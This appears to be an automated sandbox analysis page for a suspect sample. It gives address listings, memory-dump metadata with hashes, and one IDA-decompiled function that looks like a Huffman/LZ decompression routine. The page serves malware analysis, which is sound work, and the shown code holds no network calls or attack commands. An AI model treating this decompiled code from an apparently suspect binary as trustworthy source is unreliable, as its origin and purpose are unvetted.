                                                        0x00a0f30c
                                                        0x00a0f31b
                                                        0x00a0f31d
                                                        0x00a0f320
                                                        0x00a0f326
                                                        0x00a0f32b
                                                        0x00a0f33e
                                                        0x00a0f344
                                                        0x00a0f348
                                                        0x00a0f358
                                                        0x00a0f361
                                                        0x00a0f36b
                                                        0x00a0f36e
                                                        0x00a0f370
                                                        0x00a0f377
                                                        0x00a0f37d
                                                        0x00a0f38c
                                                        0x00a0f399
                                                        0x00a0f39f
                                                        0x00a0f3a7
                                                        0x00a0f3c8
                                                        0x00a0f3cb
                                                        0x00a0f3d2
                                                        0x00a0f3d6
                                                        0x00a0f3d9
                                                        0x00a0f3e3
                                                        0x00a0f3f3
                                                        0x00a0f3f8
                                                        0x00a0f400
                                                        0x00a0f417
                                                        0x00a0f41e
                                                        0x00a0f422
                                                        0x00a0f424
                                                        0x00a0f427
                                                        0x00a0f42d
                                                        0x00a0f436
                                                        0x00a0f446
                                                        0x00a0f44b
                                                        0x00a0f452
                                                        0x00a0f456
                                                        0x00a0f45a
                                                        0x00a0f465
                                                        0x00a0f466
                                                        0x00a0f470
                                                        0x00a0f470
                                                        0x00a0f470
                                                        0x00a0f473
                                                        0x00a0f476
                                                        0x00a0f47d
                                                        0x00a0f482
                                                        0x00a0f487
                                                        0x00a0f48e
                                                        0x00a0f49c
                                                        0x00a0f4ab
                                                        0x00a0f4ad
                                                        0x00a0f4b3
                                                        0x00a0f4c2
                                                        0x00a0f4c5
                                                        0x00a0f4c8
                                                        0x00a0f4c9
                                                        0x00a0f4d5
                                                        0x00a0f4d9
                                                        0x00a0f4e3
                                                        0x00a0f4e5
                                                        0x00a0f4ec
                                                        0x00a0f4fc
                                                        0x00a0f505
                                                        0x00a0f507
                                                        0x00a0f50a
                                                        0x00a0f51e
                                                        0x00a0f525
                                                        0x00a0f528
                                                        0x00a0f532
                                                        0x00a0f538
                                                        0x00a0f53c
                                                        0x00a0f54c
                                                        0x00a0f55b
                                                        0x00a0f55e
                                                        0x00a0f560
                                                        0x00a0f563
                                                        0x00a0f587
                                                        0x00a0f590
                                                        0x00a0f593
                                                        0x00a0f595
                                                        0x00a0f599
                                                        0x00a0f5a3
                                                        0x00a0f5aa
                                                        0x00a0f5c0
                                                        0x00a0f5ca
                                                        0x00a0f5cc
                                                        0x00a0f5d0
                                                        0x00a0f5de
                                                        0x00a0f5ed
                                                        0x00a0f5f5
                                                        0x00a0f5fa
                                                        0x00a0f601
                                                        0x00a0f61a
                                                        0x00a0f620
                                                        0x00a0f622
                                                        0x00a0f626
                                                        0x00a0f62c
                                                        0x00a0f634
                                                        0x00a0f639
                                                        0x00a0f649
                                                        0x00a0f64f
                                                        0x00a0f653
                                                        0x00a0f65d
                                                        0x00000000
                                                        0x00000000
                                                        0x00a0f46c
                                                        0x00a0f46c
                                                        0x00a0f665
                                                        0x00a0f666
                                                        0x00a0f66a
                                                        0x00a0f66a
                                                        0x00a0f66a
                                                        0x00a0f66f
                                                        0x00a0f673
                                                        0x00a0f678
                                                        0x00a0f67d
                                                        0x00a0f682
                                                        0x00a0f684
                                                        0x00a0f686
                                                        0x00a0f68a
                                                        0x00a0f699
                                                        0x00a0f6a8
                                                        0x00a0f6aa
                                                        0x00a0f6ad
                                                        0x00a0f6b5
                                                        0x00a0f6ba
                                                        0x00a0f6c3
                                                        0x00a0f6c9
                                                        0x00a0f6cd
                                                        0x00a0f6d1
                                                        0x00a0f6d8
                                                        0x00a0f6da
                                                        0x00a0f6ed
                                                        0x00a0f6fc
                                                        0x00a0f6fe
                                                        0x00a0f701
                                                        0x00a0f709
                                                        0x00a0f71c
                                                        0x00a0f720
                                                        0x00a0f724
                                                        0x00a0f727
                                                        0x00a0f737
                                                        0x00a0f740
                                                        0x00a0f74a
                                                        0x00a0f74d
                                                        0x00a0f74f
                                                        0x00a0f756
                                                        0x00a0f75a
                                                        0x00a0f76f
                                                        0x00a0f778
                                                        0x00a0f77c
                                                        0x00a0f780
                                                        0x00a0f7a5
                                                        0x00a0f7ae
                                                        0x00a0f7b1
                                                        0x00a0f7b3
                                                        0x00a0f7b6
                                                        0x00a0f7c4
                                                        0x00a0f7d1
                                                        0x00a0f7ee
                                                        0x00a0f7f1
                                                        0x00a0f7f5
                                                        0x00a0f7f7
                                                        0x00a0f7fa
                                                        0x00a0f800
                                                        0x00a0f808
                                                        0x00a0f811
                                                        0x00a0f815
                                                        0x00a0f81e
                                                        0x00a0f822
                                                        0x00a0f824
                                                        0x00a0f82b
                                                        0x00a0f82f
                                                        0x00a0f838
                                                        0x00a0f83c
                                                        0x00a0f83f
                                                        0x00a0f842
                                                        0x00a0f845
                                                        0x00a0f847
                                                        0x00a0f851

                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 08f5bd359781b5b3123466a5dc6871deb785564998a4d1fc58e8050fbd07c65a
                                                        • Instruction ID: 7ca7b6035b84ed9dd9c6906a6a221e4f68462f2c05cb2f7b225da0f90ff60f47
                                                        • Opcode Fuzzy Hash: 08f5bd359781b5b3123466a5dc6871deb785564998a4d1fc58e8050fbd07c65a
                                                        • Instruction Fuzzy Hash: 0A524AB26047058FC718CF19C891A6AF7E1FFCC304F498A2DE9859B255D734EA19CB86
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A16CBC Relevance: .5, Instructions: 509COMMONCrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 88%
                                                        			E00A16CBC(signed int __ecx) {
				void* __ebp;
				signed int _t201;
				signed int _t203;
				signed int _t205;
				signed int _t206;
				signed int _t207;
				signed int _t209;
				signed int _t210;
				signed int _t212;
				signed int _t214;
				signed int _t215;
				signed int _t216;
				signed int _t218;
				signed int _t219;
				signed int _t220;
				signed int _t221;
				unsigned int _t223;
				signed int _t233;
				signed int _t237;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t244;
				signed int _t245;
				signed short _t246;
				signed int _t247;
				signed int _t250;
				signed int* _t251;
				signed int _t253;
				signed int _t254;
				signed int _t255;
				unsigned int _t256;
				signed int _t259;
				signed int _t260;
				signed int _t261;
				signed int _t263;
				signed int _t264;
				signed short _t265;
				unsigned int _t269;
				unsigned int _t274;
				signed int _t279;
				signed short _t280;
				signed int _t284;
				void* _t291;
				signed int _t293;
				signed int* _t295;
				signed int _t296;
				signed int _t297;
				signed int _t301;
				signed int _t304;
				signed int _t305;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t313;
				intOrPtr _t314;
				signed int _t315;
				unsigned int _t318;
				void* _t320;
				signed int _t323;
				signed int _t324;
				unsigned int _t327;
				void* _t329;
				signed int _t332;
				void* _t335;
				signed int _t338;
				signed int _t339;
				intOrPtr* _t341;
				void* _t342;
				signed int _t345;
				signed int* _t349;
				signed int _t350;
				unsigned int _t354;
				void* _t356;
				signed int _t359;
				void* _t363;
				signed int _t366;
				signed int _t367;
				unsigned int _t370;
				void* _t372;
				signed int _t375;
				intOrPtr* _t377;
				void* _t378;
				signed int _t381;
				void* _t384;
				signed int _t388;
				signed int _t389;
				intOrPtr* _t391;
				void* _t392;
				signed int _t395;
				void* _t398;
				signed int _t401;
				signed int _t402;
				intOrPtr* _t404;
				void* _t405;
				signed int _t408;
				signed int _t414;
				unsigned int _t416;
				unsigned int _t420;
				signed int _t423;
				signed int _t424;
				unsigned int _t426;
				unsigned int _t430;
				signed int _t433;
				signed int _t434;
				void* _t435;
				signed int _t436;
				intOrPtr* _t438;
				signed char _t440;
				signed int _t442;
				intOrPtr _t443;
				signed int _t446;
				signed int _t447;
				signed int _t448;
				void* _t455;

				_t440 =  *(_t455 + 0x38);
				 *(_t455 + 0x18) = __ecx;
				if( *((char*)(_t440 + 0x2c)) != 0) {
					L3:
					_t313 =  *((intOrPtr*)(_t440 + 0x18));
					_t438 = _t440 + 4;
					__eflags =  *_t438 -  *((intOrPtr*)(_t440 + 0x24)) + _t313;
					if( *_t438 <=  *((intOrPtr*)(_t440 + 0x24)) + _t313) {
						 *(_t440 + 0x4ad8) =  *(_t440 + 0x4ad8) & 0x00000000;
						_t201 =  *((intOrPtr*)(_t440 + 0x20)) - 1 + _t313;
						_t414 =  *((intOrPtr*)(_t440 + 0x4acc)) - 0x10;
						 *(_t455 + 0x18) = _t201;
						 *(_t455 + 0x14) = _t414;
						_t293 = _t201;
						__eflags = _t201 - _t414;
						if(_t201 >= _t414) {
							_t293 = _t414;
						}
						 *(_t455 + 0x10) = _t293;
						while(1) {
							_t314 =  *_t438;
							__eflags = _t314 - _t293;
							if(_t314 < _t293) {
								goto L15;
							}
							L9:
							__eflags = _t314 - _t201;
							if(__eflags > 0) {
								L93:
								L94:
								return _t201;
							}
							if(__eflags != 0) {
								L12:
								__eflags = _t314 - _t414;
								if(_t314 < _t414) {
									L14:
									__eflags = _t314 -  *((intOrPtr*)(_t440 + 0x4acc));
									if(_t314 >=  *((intOrPtr*)(_t440 + 0x4acc))) {
										L92:
										 *((char*)(_t440 + 0x4ad3)) = 1;
										goto L93;
									}
									goto L15;
								}
								__eflags =  *((char*)(_t440 + 0x4ad2));
								if( *((char*)(_t440 + 0x4ad2)) == 0) {
									goto L92;
								}
								goto L14;
							}
							_t201 =  *(_t440 + 8);
							__eflags = _t201 -  *((intOrPtr*)(_t440 + 0x1c));
							if(_t201 >=  *((intOrPtr*)(_t440 + 0x1c))) {
								goto L93;
							}
							goto L12;
							L15:
							_t315 =  *(_t440 + 0x4adc);
							__eflags =  *(_t440 + 0x4ad8) - _t315 - 8;
							if( *(_t440 + 0x4ad8) > _t315 - 8) {
								_t284 = _t315 + _t315;
								 *(_t440 + 0x4adc) = _t284;
								_push(_t284 * 0xc);
								_push( *(_t440 + 0x4ad4));
								_t310 = E00A238AE(_t315, _t414);
								__eflags = _t310;
								if(_t310 == 0) {
									E00A06EDC(0xa40f50);
								}
								 *(_t440 + 0x4ad4) = _t310;
							}
							_t203 =  *(_t440 + 0x4ad8);
							_t295 = _t203 * 0xc +  *(_t440 + 0x4ad4);
							 *(_t455 + 0x28) = _t295;
							 *(_t440 + 0x4ad8) = _t203 + 1;
							_t205 = E00A0A9F3(_t438);
							_t206 =  *(_t440 + 0xb4);
							_t416 = _t205 & 0x0000fffe;
							__eflags = _t416 -  *((intOrPtr*)(_t440 + 0x34 + _t206 * 4));
							if(_t416 >=  *((intOrPtr*)(_t440 + 0x34 + _t206 * 4))) {
								_t442 = 0xf;
								_t207 = _t206 + 1;
								__eflags = _t207 - _t442;
								if(_t207 >= _t442) {
									L27:
									_t318 =  *(_t438 + 4) + _t442;
									 *(_t438 + 4) = _t318 & 0x00000007;
									_t209 = _t318 >> 3;
									 *_t438 =  *_t438 + _t209;
									_t320 = 0x10;
									_t443 =  *((intOrPtr*)(_t455 + 0x20));
									_t323 =  *((intOrPtr*)(_t440 + 0x74 + _t442 * 4)) + (_t416 -  *((intOrPtr*)(_t440 + 0x30 + _t442 * 4)) >> _t320 - _t442);
									__eflags = _t323 -  *((intOrPtr*)(_t440 + 0x30));
									asm("sbb eax, eax");
									_t210 = _t209 & _t323;
									__eflags = _t210;
									_t324 =  *(_t440 + 0xcb8 + _t210 * 2) & 0x0000ffff;
									goto L28;
								}
								_t404 = _t440 + 0x34 + _t207 * 4;
								while(1) {
									__eflags = _t416 -  *_t404;
									if(_t416 <  *_t404) {
										break;
									}
									_t207 = _t207 + 1;
									_t404 = _t404 + 4;
									__eflags = _t207 - 0xf;
									if(_t207 < 0xf) {
										continue;
									}
									goto L27;
								}
								_t442 = _t207;
								goto L27;
							} else {
								_t405 = 0x10;
								_t436 = _t416 >> _t405 - _t206;
								_t408 = ( *(_t436 + _t440 + 0xb8) & 0x000000ff) +  *(_t438 + 4);
								 *_t438 =  *_t438 + (_t408 >> 3);
								 *(_t438 + 4) = _t408 & 0x00000007;
								_t324 =  *(_t440 + 0x4b8 + _t436 * 2) & 0x0000ffff;
								L28:
								__eflags = _t324 - 0x100;
								if(_t324 >= 0x100) {
									__eflags = _t324 - 0x106;
									if(_t324 < 0x106) {
										__eflags = _t324 - 0x100;
										if(_t324 != 0x100) {
											__eflags = _t324 - 0x101;
											if(_t324 != 0x101) {
												_t212 = 3;
												 *_t295 = _t212;
												_t295[2] = _t324 - 0x102;
												_t214 = E00A0A9F3(_t438);
												_t215 =  *(_t440 + 0x2d78);
												_t420 = _t214 & 0x0000fffe;
												__eflags = _t420 -  *((intOrPtr*)(_t440 + 0x2cf8 + _t215 * 4));
												if(_t420 >=  *((intOrPtr*)(_t440 + 0x2cf8 + _t215 * 4))) {
													_t296 = 0xf;
													_t216 = _t215 + 1;
													__eflags = _t216 - _t296;
													if(_t216 >= _t296) {
														L85:
														_t327 =  *(_t438 + 4) + _t296;
														 *(_t438 + 4) = _t327 & 0x00000007;
														_t218 = _t327 >> 3;
														 *_t438 =  *_t438 + _t218;
														_t329 = 0x10;
														_t332 =  *((intOrPtr*)(_t440 + 0x2d38 + _t296 * 4)) + (_t420 -  *((intOrPtr*)(_t440 + 0x2cf4 + _t296 * 4)) >> _t329 - _t296);
														__eflags = _t332 -  *((intOrPtr*)(_t440 + 0x2cf4));
														asm("sbb eax, eax");
														_t219 = _t218 & _t332;
														__eflags = _t219;
														_t220 =  *(_t440 + 0x397c + _t219 * 2) & 0x0000ffff;
														L86:
														_t297 = _t220 & 0x0000ffff;
														__eflags = _t297 - 8;
														if(_t297 >= 8) {
															_t221 = 3;
															_t446 = (_t297 >> 2) - 1;
															_t301 = ((_t297 & _t221 | 0x00000004) << _t446) + 2;
															__eflags = _t446;
															if(_t446 != 0) {
																_t223 = E00A0A9F3(_t438);
																_t335 = 0x10;
																_t301 = _t301 + (_t223 >> _t335 - _t446);
																_t338 =  *(_t438 + 4) + _t446;
																 *_t438 =  *_t438 + (_t338 >> 3);
																_t339 = _t338 & 0x00000007;
																__eflags = _t339;
																 *(_t438 + 4) = _t339;
															}
														} else {
															_t301 = _t297 + 2;
														}
														( *(_t455 + 0x28))[1] = _t301;
														L91:
														_t414 =  *(_t455 + 0x18);
														_t201 =  *(_t455 + 0x1c);
														_t293 =  *(_t455 + 0x10);
														_t443 =  *((intOrPtr*)(_t455 + 0x20));
														while(1) {
															_t314 =  *_t438;
															__eflags = _t314 - _t293;
															if(_t314 < _t293) {
																goto L15;
															}
															goto L9;
														}
													}
													_t341 = _t440 + 0x2cf8 + _t216 * 4;
													while(1) {
														__eflags = _t420 -  *_t341;
														if(_t420 <  *_t341) {
															break;
														}
														_t216 = _t216 + 1;
														_t341 = _t341 + 4;
														__eflags = _t216 - 0xf;
														if(_t216 < 0xf) {
															continue;
														}
														goto L85;
													}
													_t296 = _t216;
													goto L85;
												}
												_t342 = 0x10;
												_t423 = _t420 >> _t342 - _t215;
												_t345 = ( *(_t423 + _t440 + 0x2d7c) & 0x000000ff) +  *(_t438 + 4);
												 *_t438 =  *_t438 + (_t345 >> 3);
												 *(_t438 + 4) = _t345 & 0x00000007;
												_t220 =  *(_t440 + 0x317c + _t423 * 2) & 0x0000ffff;
												goto L86;
											}
											 *_t295 = 2;
											L33:
											_t414 =  *(_t455 + 0x18);
											_t201 =  *(_t455 + 0x1c);
											_t293 =  *(_t455 + 0x10);
											continue;
										}
										_push(_t455 + 0x2c);
										E00A13B93(_t443, _t438);
										_t295[1] =  *(_t455 + 0x2c) & 0x000000ff;
										_t295[2] =  *(_t455 + 0x30);
										_t424 = 4;
										 *_t295 = _t424;
										_t233 =  *(_t440 + 0x4ad8);
										_t349 = _t233 * 0xc +  *(_t440 + 0x4ad4);
										 *(_t440 + 0x4ad8) = _t233 + 1;
										_t349[1] =  *(_t455 + 0x38) & 0x000000ff;
										 *_t349 = _t424;
										_t349[2] =  *(_t455 + 0x34);
										goto L33;
									}
									_t237 = _t324 - 0x106;
									__eflags = _t237 - 8;
									if(_t237 >= 8) {
										_t350 = 3;
										_t304 = (_t237 >> 2) - 1;
										_t237 = (_t237 & _t350 | 0x00000004) << _t304;
										__eflags = _t237;
									} else {
										_t304 = 0;
									}
									_t447 = _t237 + 2;
									 *(_t455 + 0x14) = _t447;
									__eflags = _t304;
									if(_t304 != 0) {
										_t274 = E00A0A9F3(_t438);
										_t398 = 0x10;
										_t401 =  *(_t438 + 4) + _t304;
										 *(_t455 + 0x14) = _t447 + (_t274 >> _t398 - _t304);
										 *_t438 =  *_t438 + (_t401 >> 3);
										_t402 = _t401 & 0x00000007;
										__eflags = _t402;
										 *(_t438 + 4) = _t402;
									}
									_t240 = E00A0A9F3(_t438);
									_t241 =  *(_t440 + 0xfa0);
									_t426 = _t240 & 0x0000fffe;
									__eflags = _t426 -  *((intOrPtr*)(_t440 + 0xf20 + _t241 * 4));
									if(_t426 >=  *((intOrPtr*)(_t440 + 0xf20 + _t241 * 4))) {
										_t305 = 0xf;
										_t242 = _t241 + 1;
										__eflags = _t242 - _t305;
										if(_t242 >= _t305) {
											L49:
											_t354 =  *(_t438 + 4) + _t305;
											 *(_t438 + 4) = _t354 & 0x00000007;
											_t244 = _t354 >> 3;
											 *_t438 =  *_t438 + _t244;
											_t356 = 0x10;
											_t359 =  *((intOrPtr*)(_t440 + 0xf60 + _t305 * 4)) + (_t426 -  *((intOrPtr*)(_t440 + 0xf1c + _t305 * 4)) >> _t356 - _t305);
											__eflags = _t359 -  *((intOrPtr*)(_t440 + 0xf1c));
											asm("sbb eax, eax");
											_t245 = _t244 & _t359;
											__eflags = _t245;
											_t246 =  *(_t440 + 0x1ba4 + _t245 * 2) & 0x0000ffff;
											goto L50;
										}
										_t391 = _t440 + 0xf20 + _t242 * 4;
										while(1) {
											__eflags = _t426 -  *_t391;
											if(_t426 <  *_t391) {
												break;
											}
											_t242 = _t242 + 1;
											_t391 = _t391 + 4;
											__eflags = _t242 - 0xf;
											if(_t242 < 0xf) {
												continue;
											}
											goto L49;
										}
										_t305 = _t242;
										goto L49;
									} else {
										_t392 = 0x10;
										_t434 = _t426 >> _t392 - _t241;
										_t395 = ( *(_t434 + _t440 + 0xfa4) & 0x000000ff) +  *(_t438 + 4);
										 *_t438 =  *_t438 + (_t395 >> 3);
										 *(_t438 + 4) = _t395 & 0x00000007;
										_t246 =  *(_t440 + 0x13a4 + _t434 * 2) & 0x0000ffff;
										L50:
										_t247 = _t246 & 0x0000ffff;
										__eflags = _t247 - 4;
										if(_t247 >= 4) {
											_t308 = (_t247 >> 1) - 1;
											_t247 = (_t247 & 0x00000001 | 0x00000002) << _t308;
											__eflags = _t247;
										} else {
											_t308 = 0;
										}
										_t250 = _t247 + 1;
										 *(_t455 + 0x24) = _t250;
										_t448 = _t250;
										__eflags = _t308;
										if(_t308 == 0) {
											L68:
											__eflags = _t448 - 0x100;
											if(_t448 > 0x100) {
												_t253 =  *(_t455 + 0x14) + 1;
												 *(_t455 + 0x14) = _t253;
												__eflags = _t448 - 0x2000;
												if(_t448 > 0x2000) {
													_t254 = _t253 + 1;
													 *(_t455 + 0x14) = _t254;
													__eflags = _t448 - 0x40000;
													if(_t448 > 0x40000) {
														_t255 = _t254 + 1;
														__eflags = _t255;
														 *(_t455 + 0x14) = _t255;
													}
												}
											}
											_t251 =  *(_t455 + 0x28);
											 *_t251 = 1;
											_t251[1] =  *(_t455 + 0x14);
											_t251[2] = _t448;
											goto L91;
										} else {
											__eflags = _t308 - 4;
											if(__eflags < 0) {
												_t256 = E00A1839A(_t438);
												_t363 = 0x20;
												_t448 = (_t256 >> _t363 - _t308) +  *(_t455 + 0x24);
												_t366 =  *(_t438 + 4) + _t308;
												 *_t438 =  *_t438 + (_t366 >> 3);
												_t367 = _t366 & 0x00000007;
												__eflags = _t367;
												 *(_t438 + 4) = _t367;
												goto L68;
											}
											if(__eflags > 0) {
												_t269 = E00A1839A(_t438);
												_t384 = 0x24;
												_t448 = (_t269 >> _t384 - _t308 << 4) +  *(_t455 + 0x24);
												_t388 =  *(_t438 + 4) + 0xfffffffc + _t308;
												 *_t438 =  *_t438 + (_t388 >> 3);
												_t389 = _t388 & 0x00000007;
												__eflags = _t389;
												 *(_t438 + 4) = _t389;
											}
											_t259 = E00A0A9F3(_t438);
											_t260 =  *(_t440 + 0x1e8c);
											_t430 = _t259 & 0x0000fffe;
											__eflags = _t430 -  *((intOrPtr*)(_t440 + 0x1e0c + _t260 * 4));
											if(_t430 >=  *((intOrPtr*)(_t440 + 0x1e0c + _t260 * 4))) {
												_t309 = 0xf;
												_t261 = _t260 + 1;
												__eflags = _t261 - _t309;
												if(_t261 >= _t309) {
													L65:
													_t370 =  *(_t438 + 4) + _t309;
													 *(_t438 + 4) = _t370 & 0x00000007;
													_t263 = _t370 >> 3;
													 *_t438 =  *_t438 + _t263;
													_t372 = 0x10;
													_t375 =  *((intOrPtr*)(_t440 + 0x1e4c + _t309 * 4)) + (_t430 -  *((intOrPtr*)(_t440 + 0x1e08 + _t309 * 4)) >> _t372 - _t309);
													__eflags = _t375 -  *((intOrPtr*)(_t440 + 0x1e08));
													asm("sbb eax, eax");
													_t264 = _t263 & _t375;
													__eflags = _t264;
													_t265 =  *(_t440 + 0x2a90 + _t264 * 2) & 0x0000ffff;
													goto L66;
												}
												_t377 = _t440 + 0x1e0c + _t261 * 4;
												while(1) {
													__eflags = _t430 -  *_t377;
													if(_t430 <  *_t377) {
														break;
													}
													_t261 = _t261 + 1;
													_t377 = _t377 + 4;
													__eflags = _t261 - 0xf;
													if(_t261 < 0xf) {
														continue;
													}
													goto L65;
												}
												_t309 = _t261;
												goto L65;
											} else {
												_t378 = 0x10;
												_t433 = _t430 >> _t378 - _t260;
												_t381 = ( *(_t433 + _t440 + 0x1e90) & 0x000000ff) +  *(_t438 + 4);
												 *_t438 =  *_t438 + (_t381 >> 3);
												 *(_t438 + 4) = _t381 & 0x00000007;
												_t265 =  *(_t440 + 0x2290 + _t433 * 2) & 0x0000ffff;
												L66:
												_t448 = _t448 + (_t265 & 0x0000ffff);
												goto L68;
											}
										}
									}
								}
								__eflags =  *(_t440 + 0x4ad8) - 1;
								if( *(_t440 + 0x4ad8) <= 1) {
									L34:
									 *_t295 =  *_t295 & 0x00000000;
									_t295[2] = _t324;
									_t295[1] = 0;
									goto L33;
								}
								__eflags =  *(_t295 - 0xc);
								if( *(_t295 - 0xc) != 0) {
									goto L34;
								}
								_t279 =  *(_t295 - 8) & 0x0000ffff;
								_t435 = 3;
								__eflags = _t279 - _t435;
								if(_t279 >= _t435) {
									goto L34;
								}
								_t280 = _t279 + 1;
								 *(_t295 - 8) = _t280;
								 *((_t280 & 0x0000ffff) + _t295 - 4) = _t324;
								_t68 = _t440 + 0x4ad8;
								 *_t68 =  *(_t440 + 0x4ad8) - 1;
								__eflags =  *_t68;
								goto L33;
							}
						}
					}
					 *((char*)(_t440 + 0x4ad0)) = 1;
					goto L94;
				} else {
					 *((char*)(_t440 + 0x2c)) = 1;
					_push(_t440 + 0x30);
					_push(_t440 + 0x18);
					_push(_t440 + 4);
					_t291 = E00A13FAE(__ecx);
					if(_t291 != 0) {
						goto L3;
					} else {
						 *((char*)(_t440 + 0x4ad0)) = 1;
						return _t291;
					}
				}
			}






















































































































                                                        0x00a16cc1
                                                        0x00a16cc7
                                                        0x00a16ccf
                                                        0x00a16cf6
                                                        0x00a16cf9
                                                        0x00a16cff
                                                        0x00a16d02
                                                        0x00a16d04
                                                        0x00a16d1c
                                                        0x00a16d23
                                                        0x00a16d25
                                                        0x00a16d28
                                                        0x00a16d2c
                                                        0x00a16d31
                                                        0x00a16d33
                                                        0x00a16d35
                                                        0x00a16d37
                                                        0x00a16d37
                                                        0x00a16d39
                                                        0x00a16d3d
                                                        0x00a16d3d
                                                        0x00a16d3f
                                                        0x00a16d41
                                                        0x00000000
                                                        0x00000000
                                                        0x00a16d43
                                                        0x00a16d43
                                                        0x00a16d45
                                                        0x00a172bc
                                                        0x00a172bd
                                                        0x00000000
                                                        0x00a172bd
                                                        0x00a16d4b
                                                        0x00a16d59
                                                        0x00a16d59
                                                        0x00a16d5b
                                                        0x00a16d6a
                                                        0x00a16d6a
                                                        0x00a16d70
                                                        0x00a172b5
                                                        0x00a172b5
                                                        0x00000000
                                                        0x00a172b5
                                                        0x00000000
                                                        0x00a16d70
                                                        0x00a16d5d
                                                        0x00a16d64
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a16d64
                                                        0x00a16d4d
                                                        0x00a16d50
                                                        0x00a16d53
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a16d76
                                                        0x00a16d76
                                                        0x00a16d7f
                                                        0x00a16d85
                                                        0x00a16d87
                                                        0x00a16d8a
                                                        0x00a16d93
                                                        0x00a16d94
                                                        0x00a16d9f
                                                        0x00a16da3
                                                        0x00a16da5
                                                        0x00a16dac
                                                        0x00a16dac
                                                        0x00a16db1
                                                        0x00a16db1
                                                        0x00a16db7
                                                        0x00a16dc2
                                                        0x00a16dc9
                                                        0x00a16dcd
                                                        0x00a16dd3
                                                        0x00a16dda
                                                        0x00a16de0
                                                        0x00a16de6
                                                        0x00a16dea
                                                        0x00a16e17
                                                        0x00a16e18
                                                        0x00a16e19
                                                        0x00a16e1b
                                                        0x00a16e34
                                                        0x00a16e37
                                                        0x00a16e3e
                                                        0x00a16e41
                                                        0x00a16e44
                                                        0x00a16e4c
                                                        0x00a16e55
                                                        0x00a16e59
                                                        0x00a16e5b
                                                        0x00a16e5e
                                                        0x00a16e60
                                                        0x00a16e60
                                                        0x00a16e62
                                                        0x00000000
                                                        0x00a16e62
                                                        0x00a16e20
                                                        0x00a16e23
                                                        0x00a16e23
                                                        0x00a16e25
                                                        0x00000000
                                                        0x00000000
                                                        0x00a16e27
                                                        0x00a16e28
                                                        0x00a16e2b
                                                        0x00a16e2e
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a16e30
                                                        0x00a16e32
                                                        0x00000000
                                                        0x00a16dec
                                                        0x00a16dee
                                                        0x00a16df1
                                                        0x00a16dfb
                                                        0x00a16e03
                                                        0x00a16e08
                                                        0x00a16e0b
                                                        0x00a16e6a
                                                        0x00a16e6f
                                                        0x00a16e71
                                                        0x00a16ebf
                                                        0x00a16ec5
                                                        0x00a17138
                                                        0x00a1713a
                                                        0x00a1718b
                                                        0x00a17191
                                                        0x00a171a0
                                                        0x00a171a1
                                                        0x00a171ab
                                                        0x00a171ae
                                                        0x00a171b5
                                                        0x00a171bb
                                                        0x00a171c1
                                                        0x00a171c8
                                                        0x00a171f5
                                                        0x00a171f6
                                                        0x00a171f7
                                                        0x00a171f9
                                                        0x00a17215
                                                        0x00a17218
                                                        0x00a1721f
                                                        0x00a17222
                                                        0x00a17225
                                                        0x00a17230
                                                        0x00a1723c
                                                        0x00a1723e
                                                        0x00a17244
                                                        0x00a17246
                                                        0x00a17246
                                                        0x00a17248
                                                        0x00a17250
                                                        0x00a17250
                                                        0x00a17253
                                                        0x00a17256
                                                        0x00a17264
                                                        0x00a17267
                                                        0x00a1726f
                                                        0x00a17272
                                                        0x00a17274
                                                        0x00a17278
                                                        0x00a1727f
                                                        0x00a17287
                                                        0x00a17289
                                                        0x00a17290
                                                        0x00a17292
                                                        0x00a17292
                                                        0x00a17295
                                                        0x00a17295
                                                        0x00a17258
                                                        0x00a17258
                                                        0x00a17258
                                                        0x00a1729c
                                                        0x00a172a0
                                                        0x00a172a0
                                                        0x00a172a4
                                                        0x00a172a8
                                                        0x00a172ac
                                                        0x00a16d3d
                                                        0x00a16d3d
                                                        0x00a16d3f
                                                        0x00a16d41
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a16d41
                                                        0x00a16d3d
                                                        0x00a17201
                                                        0x00a17204
                                                        0x00a17204
                                                        0x00a17206
                                                        0x00000000
                                                        0x00000000
                                                        0x00a17208
                                                        0x00a17209
                                                        0x00a1720c
                                                        0x00a1720f
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a17211
                                                        0x00a17213
                                                        0x00000000
                                                        0x00a17213
                                                        0x00a171cc
                                                        0x00a171cf
                                                        0x00a171d9
                                                        0x00a171e1
                                                        0x00a171e6
                                                        0x00a171e9
                                                        0x00000000
                                                        0x00a171e9
                                                        0x00a17193
                                                        0x00a16ea0
                                                        0x00a16ea0
                                                        0x00a16ea4
                                                        0x00a16ea8
                                                        0x00000000
                                                        0x00a16ea8
                                                        0x00a17142
                                                        0x00a17144
                                                        0x00a1714e
                                                        0x00a17156
                                                        0x00a1715b
                                                        0x00a1715c
                                                        0x00a1715e
                                                        0x00a17167
                                                        0x00a1716e
                                                        0x00a17179
                                                        0x00a17181
                                                        0x00a17183
                                                        0x00000000
                                                        0x00a17183
                                                        0x00a16ecb
                                                        0x00a16ed1
                                                        0x00a16ed4
                                                        0x00a16ee1
                                                        0x00a16ee4
                                                        0x00a16eea
